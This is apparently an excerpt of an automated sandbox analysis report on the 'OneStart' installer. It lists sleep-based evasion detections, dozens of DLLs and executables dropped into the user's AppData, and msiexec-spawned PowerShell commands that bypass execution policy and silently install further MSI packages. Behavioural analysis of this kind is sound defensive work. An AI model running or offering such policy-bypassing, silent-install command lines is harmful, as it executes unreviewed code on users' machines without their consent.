          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4016 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3180 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 624 Thread sleep count: 2369 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5960 Thread sleep count: 1392 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4840 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2368 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1180 Thread sleep count: 3359 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1180 Thread sleep count: 1962 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6420 Thread sleep time: -3689348814741908s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6528 Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3372 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5480 Thread sleep count: 3038 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6572 Thread sleep count: 2555 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5372 Thread sleep time: -2767011611056431s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6816 Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6216 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1312 Thread sleep count: 2709 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1312 Thread sleep count: 1810 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6684 Thread sleep time: -1844674407370954s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6616 Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7028 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4292 Thread sleep count: 1590 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4292 Thread sleep count: 2179 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6624 Thread sleep time: -1844674407370954s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4352 Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6208 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6448 Thread sleep count: 2102 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6448 Thread sleep count: 1517 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6760 Thread sleep time: -3689348814741908s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6040 Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5216 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Globalization.Extensions.dll
          Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.Serialization.Json.dll
          Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.MemoryMappedFiles.dll
          Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Collections.NonGeneric.dll
          Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\ScreenRecorderLib.dll
          Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Reflection.Primitives.dll
          Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Collections.Specialized.dll
          Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\Unity.Container.dll
          Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Text.Encoding.Extensions.dll
          Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\Newtonsoft.Json.dll
          Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Reflection.dll
          Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\msvcp140_2.dll
          Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.TextWriterTraceListener.dll
          Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Linq.dll
          Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\Microsoft.WindowsAPICodePack.Shell.dll
          Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.FileSystem.Watcher.dll
          Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Threading.Tasks.Parallel.dll
          Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.CompilerServices.Unsafe.dll
          Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Security.Cryptography.X509Certificates.dll
          Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.Extensions.dll
          Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Security.Principal.dll
          Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.NameResolution.dll
          Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.ComponentModel.TypeConverter.dll
          Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Console.dll
          Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Xml.XmlDocument.dll
          Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\netstandard.dll
          Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.Process.dll
          Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.Serialization.Formatters.dll
          Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Text.Json.dll
          Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.WebSockets.Client.dll
          Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Security.Cryptography.Encoding.dll
          Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.Pipes.dll
          Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.Debug.dll
          Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\Unity.Abstractions.dll
          Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.Requests.dll
          Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\updater.exe
          Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.ComponentModel.dll
          Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.Primitives.dll
          Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Xml.XmlSerializer.dll
          Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Resources.Reader.dll
          Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Linq.Queryable.dll
          Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Threading.dll
          Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Threading.Thread.dll
          Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.dll
          Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Buffers.dll
          Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.CompilerServices.VisualC.dll
          Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.Tools.dll
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Threading.Tasks.Extensions.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\Microsoft.Win32.Primitives.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.Handles.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.Security.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.Contracts.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Xml.XPath.XDocument.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.InteropServices.RuntimeInformation.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\DBarCore.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Collections.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.Sockets.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.Serialization.Xml.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Security.Cryptography.Algorithms.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Threading.Tasks.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Numerics.Vectors.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.NetworkInformation.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\msvcp140_1.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Dynamic.Runtime.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.FileSystem.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.FileVersionInfo.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.WebHeaderCollection.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Xml.XPath.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.StackTrace.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Globalization.Calendars.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Data.Common.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Security.Claims.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Globalization.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Security.SecureString.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.TraceSource.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI112.tmpJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Security.Cryptography.Primitives.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Text.RegularExpressions.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\HtmlAgilityPack.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Linq.Expressions.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Reflection.Extensions.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\msvcp140_codecvt_ids.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.FileSystem.DriveInfo.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\vcruntime140.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Security.Cryptography.Csp.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Xml.ReaderWriter.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.Compression.ZipFile.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.AppContext.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\Microsoft.WindowsAPICodePack.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.Compression.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.Tracing.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\DBar.exeJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.Http.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Threading.Overlapped.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Memory.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\vccorlib140.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.WebSockets.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.UnmanagedMemoryStream.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Resources.Writer.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Linq.Parallel.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Resources.ResourceManager.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\msvcp140_atomic_wait.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Collections.Concurrent.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Text.Encodings.Web.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\Microsoft.Xaml.Behaviors.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.ComponentModel.Primitives.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Drawing.Primitives.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.FileSystem.Primitives.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.ObjectModel.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\FluentWPF.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Threading.ThreadPool.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\msvcp140.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\Flurl.Http.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.Ping.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\websocket-sharp.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.Numerics.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Xml.XDocument.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\Flurl.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.InteropServices.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\Microsoft.Bcl.AsyncInterfaces.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Text.Encoding.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.IsolatedStorage.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.ValueTuple.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Threading.Timer.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\concrt140.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.Serialization.Primitives.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI9297.tmpJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\OneStart\bar\System.ComponentModel.EventBasedAsync.dllJump to dropped file
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3168
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2692
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2062
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2470
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2824
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2044
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3914
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2989
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2606
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6055
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2768
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1852
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1541
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 910
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2369
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1392
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3359
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1962
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3038
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2555
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2709
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1810
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1590
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2179
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2102
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1517
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
          Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss9362.tmp.ps1"
          Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss14E.tmp.ps1"
          Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss338E.tmp.ps1"
          Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss5F45.tmp.ps1"
          Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss68A3.tmp.ps1"
          Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssE3B5.tmp.ps1"
          Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\OneStart.ai\OneStart Software\prerequisites\OneStartBarSetup.msi" /qn
          Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\OneStart.ai\OneStart Software\prerequisites\WCSetup_OstWC.msi" /q
          Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss9D9A.tmp.ps1"
          Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssDFC8.tmp.ps1"
